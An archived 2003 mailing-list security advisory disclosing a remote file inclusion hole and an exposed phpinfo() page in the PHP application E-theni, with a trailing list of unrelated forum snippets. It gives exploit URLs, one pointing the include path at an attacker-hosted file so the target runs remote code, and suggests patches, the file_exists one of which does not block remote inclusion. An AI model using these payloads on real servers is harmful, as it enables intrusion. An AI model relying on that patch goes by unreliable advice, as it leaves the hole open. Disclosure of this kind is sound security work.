[VulnWatch] E-theni (PHP)

From: Frog Man (leseulfrog@hotmail.com)
Date: 01/06/03

  • Next message: Tiina Anita Muukkonen: "[VulnWatch] Re: Opentype font file causes Windows to restart."
    From: "Frog Man" <leseulfrog@hotmail.com>
    To: bugtraq@securityfocus.com
    Date: Mon, 06 Jan 2003 21:25:43 +0100
    
    

    Informations :
    같같같같같같같
    Version : ?
    Website : http://www.theni.freesurf.fr
    Problems :
    - Include file
    - phpinfo()

    PHP Code/Location :
    같같같같같같같같같
    /admin_t/include/aff_liste_langue.php :
    -----------------------------------------
    require ($rep_include."para_langue.php");
    -----------------------------------------

    /admin_t/include/find_theni_home.php :
    --------------
    <html>
    <body>
    <?
    phpinfo();
    ?>
    </body></html>
    --------------

    Exploits :
    같같같같같
    -
    http://[target]/admin_t/include/aff_liste_langue.php?rep_include=http://[attacker]/
    with :
    http://[attacker]/para_langue.php

    (This will work only if register_globals=ON)

    - http://[target]/admin_t/include/find_theni_home.php

    Patchs :
    같같같같
    In admin_t/include/aff_liste_langue.php, replace the line :
    -----------------------------------------
    require ($rep_include."para_langue.php");
    -----------------------------------------
    by :
    -------------------------------------------------
    if (file_exists($rep_include."para_langue.php")){
    require ($rep_include."para_langue.php");
    }
    -------------------------------------------------

    &

    To replace the file /admin_t/include/find_theni_home.php by :
    --------------------------------------------------------------
    <?
    session_start();
    if (session_is_registered("USER")==FALSE or $USER[id_user]<1){
    exit;
    } else {
    echo "<html>";
    echo "<body>";
    phpinfo();
    echo "</body></html>";
    }
    ?>
    --------------------------------------------------------------

    A patch can be found on http://www.phpsecure.org.

    More details :
    같같같같같같같
    In French :
    http://www.frog-man.org/tutos/E-theni.txt
    Translated by Google :
    http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2FE-theni.txt&langpair=fr%7Cen&hl=en&ie=ISO-8859-1&prev=%2Flanguage_tools1:55:35 +0100 (CET)

    frog-m@n

    _________________________________________________________________
    MSN Messenger : discutez en direct avec vos amis !
    http://www.msn.fr/msger/default.asp



    Relevant Pages

    • Re: probably stupid problem
      ... echo ''; ... It's easier than the output of phpinfo():) ... for scripts running on apache or IIS. ...
      (comp.lang.php)
    • Re: Zend blank page
      ... I've tried to modify /public/index.php file with some breakpoit and I ... can't show echo after; ... did you compare the output of phpinfo() on both of them to see what is different? ...
      (comp.lang.php)
    • Re: i am getting the php coding while running the php..
      ... i am getting the coding <?php echo phpinfo(); ... not show the php information...... ...
      (comp.lang.php)
    • E-theni (PHP)
      ... Website: http://www.theni.freesurf.fr ... echo ""; ...
      (Bugtraq)
    • Re: phpinfo is not affected by html_errors
      ... about the errors php output for an invalid line... ... > force the output from phpinfo to be either plain text or HTML. ... One is executes as CGI, ...
      (comp.lang.php)